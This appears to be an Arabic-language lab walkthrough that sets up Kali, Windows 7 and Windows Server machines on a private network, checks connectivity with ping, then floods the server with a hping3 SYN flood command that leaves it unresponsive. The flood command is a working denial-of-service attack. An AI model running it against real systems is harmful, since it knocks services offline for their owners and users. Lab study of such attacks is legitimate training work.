_أولاً: لكي نحصل على ip الخاصبجاز الكالي (المهاجم) عن طريق تعليمة if config 
حيث الip الخاص به هو 192.168.2.3.

_ثانياً :الIP الخاص بجهاز الWidows7( الضحية) من خلال cmd نكتب تعليمة ipconfig.
حيث الIP له هو 192.168.2.1.

_ثالثاً: لكي نحصل على الIP الخاص بجهاز الwidows server عن طريق الcmd تكتب تعلمية ipconfig
حبث الIP الخاص به 192.168.2.100
*****************************************************************************************************************************************

الآن لكي نتأكد منع ملية الإتصال بين أجهزة الثلاث:
من الWindows server نقوم بعمل Ping لجهاز الWindows 7 والكالي
ping 192.168.2.1
يجب أن يعطيني Replay.
ping 192.168.2.3
يجب أن يعطيني Repaly.
*******************************************************************************************************************************************

الآن من عند الwidows7 نتأكد من عملية الإتصال نقوك بعمل Pingلجهاز الWindwos serve.
ping 192.168.2.100
ping 192.168.2.1 
*******************************************************************************************************************************************
وأيضاً من الكالي نفس الشيء.
*******************************************************************************************************************************************

الآن لكي نقوم يتفعيل الهجوم (DDos) وذلك عن طريق تعليمة sudo hping3 -d200 -p80 -S --Flood 192.168.2.100

حيث الآن إذا قمنا بعمل Ping من اي جهاز للWindwos server لا يستجيب ويظهر لنا Requst Time out.